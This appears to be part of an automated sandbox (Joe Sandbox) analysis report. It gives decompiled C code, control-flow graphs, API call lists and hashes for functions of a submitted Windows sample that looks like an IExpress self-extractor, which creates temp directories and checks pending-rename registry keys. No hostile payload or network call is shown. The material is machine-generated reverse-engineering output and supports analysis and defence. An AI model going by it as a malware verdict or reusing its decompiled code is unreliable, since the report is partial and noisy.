                                                                                                                                                                                                      control_flow_graph 522 3e5467-3e5484 523 3e551c-3e5528 call 3e1680 522->523 524 3e548a-3e5490 call 3e53a1 522->524 527 3e552d-3e5539 call 3e58c8 523->527 528 3e5495-3e5497 524->528 537 3e554d-3e5552 527->537 538 3e553b-3e5545 CreateDirectoryA 527->538 530 3e549d-3e54c0 call 3e1781 528->530 531 3e5581-3e5583 528->531 539 3e550c-3e551a call 3e658a 530->539 540 3e54c2-3e54d8 GetSystemInfo 530->540 534 3e558d-3e559d call 3e6ce0 531->534 544 3e5554-3e5557 call 3e597d 537->544 545 3e5585-3e558b 537->545 542 3e5577-3e557c call 3e6285 538->542 543 3e5547 538->543 539->527 546 3e54fe 540->546 547 3e54da-3e54dd 540->547 542->531 543->537 553 3e555c-3e555e 544->553 545->534 554 3e5503-3e5507 call 3e658a 546->554 551 3e54df-3e54e2 547->551 552 3e54f7-3e54fc 547->552 557 3e54e4-3e54e7 551->557 558 3e54f0-3e54f5 551->558 552->554 553->545 559 3e5560-3e5566 553->559 554->539 557->539 561 3e54e9-3e54ee 557->561 558->554 559->531 562 3e5568-3e5575 RemoveDirectoryA 559->562 561->554 562->531
                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                      			E003E5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t10;
                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                      				intOrPtr _t14;
                                                                                                                                                                                                      				void* _t16;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				signed int _t26;
                                                                                                                                                                                                      				void* _t28;
                                                                                                                                                                                                      				void* _t29;
                                                                                                                                                                                                      				CHAR* _t48;
                                                                                                                                                                                                      				signed int _t49;
                                                                                                                                                                                                      				intOrPtr _t61;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t10 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				if(__edx == 0) {
                                                                                                                                                                                                      					_t48 = 0x3e91e4;
                                                                                                                                                                                                      					_t42 = 0x104;
                                                                                                                                                                                                      					E003E1680(0x3e91e4, 0x104);
                                                                                                                                                                                                      					L14:
                                                                                                                                                                                                      					_t13 = E003E58C8(_t48); // executed
                                                                                                                                                                                                      					if(_t13 != 0) {
                                                                                                                                                                                                      						L17:
                                                                                                                                                                                                      						_t42 = _a4;
                                                                                                                                                                                                      						if(_a4 == 0) {
                                                                                                                                                                                                      							L23:
                                                                                                                                                                                                      							 *0x3e9124 = 0;
                                                                                                                                                                                                      							_t14 = 1;
                                                                                                                                                                                                      							L24:
                                                                                                                                                                                                      							return E003E6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t16 = E003E597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                      						if(_t16 != 0) {
                                                                                                                                                                                                      							goto L23;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t61 =  *0x3e8a20; // 0x0
                                                                                                                                                                                                      						if(_t61 != 0) {
                                                                                                                                                                                                      							 *0x3e8a20 = 0;
                                                                                                                                                                                                      							RemoveDirectoryA(_t48);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L22:
                                                                                                                                                                                                      						_t14 = 0;
                                                                                                                                                                                                      						goto L24;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                      						 *0x3e9124 = E003E6285();
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *0x3e8a20 = 1;
                                                                                                                                                                                                      					goto L17;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t42 =  &_v268;
                                                                                                                                                                                                      				_t20 = E003E53A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                      				if(_t20 == 0) {
                                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_t48 = 0x3e91e4;
                                                                                                                                                                                                      				E003E1781(0x3e91e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                      				if(( *0x3e9a34 & 0x00000020) == 0) {
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					_t42 = 0x104;
                                                                                                                                                                                                      					E003E658A(_t48, 0x104, 0x3e1140);
                                                                                                                                                                                                      					goto L14;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				GetSystemInfo( &_v304);
                                                                                                                                                                                                      				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                      				if(_t26 == 0) {
                                                                                                                                                                                                      					_push("i386");
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					E003E658A(_t48, 0x104);
                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t28 = _t26 - 1;
                                                                                                                                                                                                      				if(_t28 == 0) {
                                                                                                                                                                                                      					_push("mips");
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t29 = _t28 - 1;
                                                                                                                                                                                                      				if(_t29 == 0) {
                                                                                                                                                                                                      					_push("alpha");
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t29 != 1) {
                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push("ppc");
                                                                                                                                                                                                      				goto L11;
                                                                                                                                                                                                      			}





















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E54C9
                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E553D
                                                                                                                                                                                                      • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E556F
                                                                                                                                                                                                        • Part of subcall function 003E53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E53FB
                                                                                                                                                                                                        • Part of subcall function 003E53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E5402
                                                                                                                                                                                                        • Part of subcall function 003E53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E541F
                                                                                                                                                                                                        • Part of subcall function 003E53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E542B
                                                                                                                                                                                                        • Part of subcall function 003E53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E5434
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                      • API String ID: 1979080616-1000730752
                                                                                                                                                                                                      • Opcode ID: 27ac9036613c419f8361d9b075e7bb1ae1b0109f66c05b2d2336c8f0d6d83b46
                                                                                                                                                                                                      • Instruction ID: cc5586c8a62438b7ab4ff459cf883135d009677e55ba9aa40426871819222028
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27ac9036613c419f8361d9b075e7bb1ae1b0109f66c05b2d2336c8f0d6d83b46
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2631EA71B00AF45BCB239B279C456FE779EAB92348F15033AE407DA6D0DB708E418A91
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 563 3e256d-3e257d 564 3e2622-3e2627 call 3e24e0 563->564 565 3e2583-3e2589 563->565 569 3e2629-3e262f 564->569 566 3e258b 565->566 567 3e25e8-3e2607 RegOpenKeyExA 565->567 566->569 570 3e2591-3e2595 566->570 571 3e2609-3e2620 RegQueryInfoKeyA 567->571 572 3e25e3-3e25e6 567->572 570->569 574 3e259b-3e25ba RegOpenKeyExA 570->574 575 3e25d1-3e25dd RegCloseKey 571->575 572->569 574->572 576 3e25bc-3e25cb RegQueryValueExA 574->576 575->572 576->575
                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                      			E003E256D(signed int __ecx) {
                                                                                                                                                                                                      				int _v8;
                                                                                                                                                                                                      				void* _v12;
                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                                      				long _t24;
                                                                                                                                                                                                      				void* _t26;
                                                                                                                                                                                                      				int _t31;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                      				_t31 = 0;
                                                                                                                                                                                                      				if(_t13 == 0) {
                                                                                                                                                                                                      					_t31 = E003E24E0(_t26);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t34 = _t13 - 1;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						_v8 = 0;
                                                                                                                                                                                                      						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                      							goto L7;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                      							goto L6;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L12:
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                      							_v8 = 0;
                                                                                                                                                                                                      							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                      							if(_t24 == 0) {
                                                                                                                                                                                                      								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                      								L6:
                                                                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                                                                      								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                      								RegCloseKey(_v12); // executed
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							L7:
                                                                                                                                                                                                      							_t31 = _v8;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t31;
                                                                                                                                                                                                      				goto L12;
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,003E4096,003E4096,?,003E1ED3,00000001,00000000,?,?,003E4137,?), ref: 003E25B2
                                                                                                                                                                                                      • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,003E4096,?,003E1ED3,00000001,00000000,?,?,003E4137,?,003E4096), ref: 003E25CB
                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,003E1ED3,00000001,00000000,?,?,003E4137,?,003E4096), ref: 003E25DD
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,003E4096,003E4096,?,003E1ED3,00000001,00000000,?,?,003E4137,?), ref: 003E25FF
                                                                                                                                                                                                      • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,003E4096,00000000,00000000,00000000,00000000,?,003E1ED3,00000001,00000000), ref: 003E261A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • PendingFileRenameOperations, xrefs: 003E25C3
                                                                                                                                                                                                      • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 003E25F5
                                                                                                                                                                                                      • System\CurrentControlSet\Control\Session Manager, xrefs: 003E25A8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                      • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                      • API String ID: 2209512893-559176071
                                                                                                                                                                                                      • Opcode ID: 1e96aa83aff6d8a3f4c0664efa22f24b1dd72ef6c4a799c6c814ac62b5f50b68
                                                                                                                                                                                                      • Instruction ID: 64566e931cc17646203b65a560553f1632f9bbe4d5715f4312668706de057de9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e96aa83aff6d8a3f4c0664efa22f24b1dd72ef6c4a799c6c814ac62b5f50b68
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18116D359022B8BBDB22DB939C49DFBBE6CEF017A1F114255F808A20C0D6705E44E6A1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 577 3e6a60-3e6a91 call 3e7155 call 3e7208 GetStartupInfoW 583 3e6a93-3e6aa2 577->583 584 3e6abc-3e6abe 583->584 585 3e6aa4-3e6aa6 583->585 586 3e6abf-3e6ac5 584->586 587 3e6aaf-3e6aba Sleep 585->587 588 3e6aa8-3e6aad 585->588 589 3e6ac7-3e6acf _amsg_exit 586->589 590 3e6ad1-3e6ad7 586->590 587->583 588->586 591 3e6b0b-3e6b11 589->591 592 3e6ad9-3e6ae9 call 3e6c3f 590->592 593 3e6b05 590->593 595 3e6b2e-3e6b30 591->595 596 3e6b13-3e6b24 _initterm 591->596 597 3e6aee-3e6af2 592->597 593->591 598 3e6b3b-3e6b42 595->598 599 3e6b32-3e6b39 595->599 596->595 597->591 600 3e6af4-3e6b00 597->600 601 3e6b67-3e6b71 598->601 602 3e6b44-3e6b51 call 3e7060 598->602 599->598 604 3e6c39-3e6c3e call 3e724d 600->604 603 3e6b74-3e6b79 601->603 602->601 610 3e6b53-3e6b65 602->610 607 3e6b7b-3e6b7d 603->607 608 3e6bc5-3e6bc8 603->608 613 3e6b7f-3e6b81 607->613 614 3e6b94-3e6b98 607->614 611 3e6bca-3e6bd3 608->611 612 3e6bd6-3e6be3 _ismbblead 608->612 610->601 611->612 616 3e6be9-3e6bed 612->616 617 3e6be5-3e6be6 612->617 613->608 618 3e6b83-3e6b85 613->618 619 3e6b9a-3e6b9e 614->619 620 3e6ba0-3e6ba2 614->620 616->603 622 3e6c1e-3e6c25 616->622 617->616 618->614 623 3e6b87-3e6b8a 618->623 624 3e6ba3-3e6bbc call 3e2bfb 619->624 620->624 626 3e6c27-3e6c2d _cexit 622->626 627 3e6c32 622->627 623->614 628 3e6b8c-3e6b92 623->628 624->622 630 3e6bbe-3e6bbf exit 624->630 626->627 627->604 628->618 630->608
                                                                                                                                                                                                      C-Code - Quality: 51%
                                                                                                                                                                                                      			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                      				signed int* _t25;
                                                                                                                                                                                                      				signed int _t26;
                                                                                                                                                                                                      				signed int _t29;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				signed int _t37;
                                                                                                                                                                                                      				signed char _t41;
                                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                                      				signed int _t54;
                                                                                                                                                                                                      				intOrPtr _t56;
                                                                                                                                                                                                      				signed int _t58;
                                                                                                                                                                                                      				signed int _t59;
                                                                                                                                                                                                      				intOrPtr* _t60;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				void* _t67;
                                                                                                                                                                                                      				void* _t68;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				E003E7155();
                                                                                                                                                                                                      				_push(0x58);
                                                                                                                                                                                                      				_push(0x3e72b8);
                                                                                                                                                                                                      				E003E7208(__ebx, __edi, __esi);
                                                                                                                                                                                                      				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                      				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                      				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                      				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                      				_t53 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                      					if(0 == 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(0 != _t56) {
                                                                                                                                                                                                      						Sleep(0x3e8);
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t58 = 1;
                                                                                                                                                                                                      						_t53 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L7:
                                                                                                                                                                                                      					_t67 =  *0x3e88b0 - _t58; // 0x2
                                                                                                                                                                                                      					if(_t67 != 0) {
                                                                                                                                                                                                      						__eflags =  *0x3e88b0; // 0x2
                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                      							 *0x3e81e4 = _t58;
                                                                                                                                                                                                      							goto L13;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							 *0x3e88b0 = _t58;
                                                                                                                                                                                                      							_t37 = E003E6C3F(0x3e10b8, 0x3e10c4); // executed
                                                                                                                                                                                                      							__eflags = _t37;
                                                                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                                                                      								goto L13;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                      								_t30 = 0xff;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_push(0x1f);
                                                                                                                                                                                                      						L003E6FF4();
                                                                                                                                                                                                      						L13:
                                                                                                                                                                                                      						_t68 =  *0x3e88b0 - _t58; // 0x2
                                                                                                                                                                                                      						if(_t68 == 0) {
                                                                                                                                                                                                      							_push(0x3e10b4);
                                                                                                                                                                                                      							_push(0x3e10ac);
                                                                                                                                                                                                      							L003E7202();
                                                                                                                                                                                                      							 *0x3e88b0 = 2;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if(_t53 == 0) {
                                                                                                                                                                                                      							 *0x3e88ac = 0;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t71 =  *0x3e88b4;
                                                                                                                                                                                                      						if( *0x3e88b4 != 0 && E003E7060(_t71, 0x3e88b4) != 0) {
                                                                                                                                                                                                      							_t60 =  *0x3e88b4; // 0x0
                                                                                                                                                                                                      							 *0x3ea288(0, 2, 0);
                                                                                                                                                                                                      							 *_t60();
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t25 = __imp___acmdln; // 0x76665b9c
                                                                                                                                                                                                      						_t59 =  *_t25;
                                                                                                                                                                                                      						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                      							_t41 =  *_t59;
                                                                                                                                                                                                      							if(_t41 > 0x20) {
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							if(_t41 != 0) {
                                                                                                                                                                                                      								if(_t54 != 0) {
                                                                                                                                                                                                      									goto L32;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                      										_t59 = _t59 + 1;
                                                                                                                                                                                                      										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      										_t41 =  *_t59;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                      							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                      								_t29 = 0xa;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push(_t29);
                                                                                                                                                                                                      							_t30 = E003E2BFB(0x3e0000, 0, _t59); // executed
                                                                                                                                                                                                      							 *0x3e81e0 = _t30;
                                                                                                                                                                                                      							__eflags =  *0x3e81f8;
                                                                                                                                                                                                      							if( *0x3e81f8 == 0) {
                                                                                                                                                                                                      								exit(_t30); // executed
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags =  *0x3e81e4;
                                                                                                                                                                                                      							if( *0x3e81e4 == 0) {
                                                                                                                                                                                                      								__imp___cexit();
                                                                                                                                                                                                      								_t30 =  *0x3e81e0; // 0x80070002
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                      							goto L40;
                                                                                                                                                                                                      							L32:
                                                                                                                                                                                                      							__eflags = _t41 - 0x22;
                                                                                                                                                                                                      							if(_t41 == 0x22) {
                                                                                                                                                                                                      								__eflags = _t54;
                                                                                                                                                                                                      								_t15 = _t54 == 0;
                                                                                                                                                                                                      								__eflags = _t15;
                                                                                                                                                                                                      								_t54 = 0 | _t15;
                                                                                                                                                                                                      								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                      							__imp___ismbblead(_t26);
                                                                                                                                                                                                      							__eflags = _t26;
                                                                                                                                                                                                      							if(_t26 != 0) {
                                                                                                                                                                                                      								_t59 = _t59 + 1;
                                                                                                                                                                                                      								__eflags = _t59;
                                                                                                                                                                                                      								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t59 = _t59 + 1;
                                                                                                                                                                                                      							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L40:
                                                                                                                                                                                                      					return E003E724D(_t30);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t58 = 1;
                                                                                                                                                                                                      				__eflags = 1;
                                                                                                                                                                                                      				goto L7;
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      0x003e6ac9
                                                                                                                                                                                                      0x003e6b0b
                                                                                                                                                                                                      0x003e6b0b
                                                                                                                                                                                                      0x003e6b11
                                                                                                                                                                                                      0x003e6b13
                                                                                                                                                                                                      0x003e6b18
                                                                                                                                                                                                      0x003e6b1d
                                                                                                                                                                                                      0x003e6b24
                                                                                                                                                                                                      0x003e6b24
                                                                                                                                                                                                      0x003e6b30
                                                                                                                                                                                                      0x003e6b39
                                                                                                                                                                                                      0x003e6b39
                                                                                                                                                                                                      0x003e6b3b
                                                                                                                                                                                                      0x003e6b42
                                                                                                                                                                                                      0x003e6b57
                                                                                                                                                                                                      0x003e6b5f
                                                                                                                                                                                                      0x003e6b65
                                                                                                                                                                                                      0x003e6b65
                                                                                                                                                                                                      0x003e6b67
                                                                                                                                                                                                      0x003e6b6c
                                                                                                                                                                                                      0x003e6b6e
                                                                                                                                                                                                      0x003e6b71
                                                                                                                                                                                                      0x003e6b74
                                                                                                                                                                                                      0x003e6b74
                                                                                                                                                                                                      0x003e6b79
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e6b7d
                                                                                                                                                                                                      0x003e6b81
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e6b83
                                                                                                                                                                                                      0x003e6b8c
                                                                                                                                                                                                      0x003e6b8d
                                                                                                                                                                                                      0x003e6b90
                                                                                                                                                                                                      0x003e6b90
                                                                                                                                                                                                      0x003e6b83
                                                                                                                                                                                                      0x003e6b81
                                                                                                                                                                                                      0x003e6b94
                                                                                                                                                                                                      0x003e6b98
                                                                                                                                                                                                      0x003e6ba2
                                                                                                                                                                                                      0x003e6b9a
                                                                                                                                                                                                      0x003e6b9a
                                                                                                                                                                                                      0x003e6b9a
                                                                                                                                                                                                      0x003e6ba3
                                                                                                                                                                                                      0x003e6bab
                                                                                                                                                                                                      0x003e6bb0
                                                                                                                                                                                                      0x003e6bb5
                                                                                                                                                                                                      0x003e6bbc
                                                                                                                                                                                                      0x003e6bbf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e6bbf
                                                                                                                                                                                                      0x003e6c1e
                                                                                                                                                                                                      0x003e6c25
                                                                                                                                                                                                      0x003e6c27
                                                                                                                                                                                                      0x003e6c2d
                                                                                                                                                                                                      0x003e6c2d
                                                                                                                                                                                                      0x003e6c32
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e6bc5
                                                                                                                                                                                                      0x003e6bc5
                                                                                                                                                                                                      0x003e6bc8
                                                                                                                                                                                                      0x003e6bcc
                                                                                                                                                                                                      0x003e6bce
                                                                                                                                                                                                      0x003e6bce
                                                                                                                                                                                                      0x003e6bd1
                                                                                                                                                                                                      0x003e6bd3
                                                                                                                                                                                                      0x003e6bd3
                                                                                                                                                                                                      0x003e6bd6
                                                                                                                                                                                                      0x003e6bda
                                                                                                                                                                                                      0x003e6be1
                                                                                                                                                                                                      0x003e6be3
                                                                                                                                                                                                      0x003e6be5
                                                                                                                                                                                                      0x003e6be5
                                                                                                                                                                                                      0x003e6be6
                                                                                                                                                                                                      0x003e6be6
                                                                                                                                                                                                      0x003e6be9
                                                                                                                                                                                                      0x003e6bea
                                                                                                                                                                                                      0x003e6bea
                                                                                                                                                                                                      0x003e6b74
                                                                                                                                                                                                      0x003e6c39
                                                                                                                                                                                                      0x003e6c3e
                                                                                                                                                                                                      0x003e6c3e
                                                                                                                                                                                                      0x003e6abe
                                                                                                                                                                                                      0x003e6abe
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 003E7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 003E7182
                                                                                                                                                                                                        • Part of subcall function 003E7155: GetCurrentProcessId.KERNEL32 ref: 003E7191
                                                                                                                                                                                                        • Part of subcall function 003E7155: GetCurrentThreadId.KERNEL32 ref: 003E719A
                                                                                                                                                                                                        • Part of subcall function 003E7155: GetTickCount.KERNEL32 ref: 003E71A3
                                                                                                                                                                                                        • Part of subcall function 003E7155: QueryPerformanceCounter.KERNEL32(?), ref: 003E71B8
                                                                                                                                                                                                      • GetStartupInfoW.KERNEL32(?,003E72B8,00000058), ref: 003E6A7F
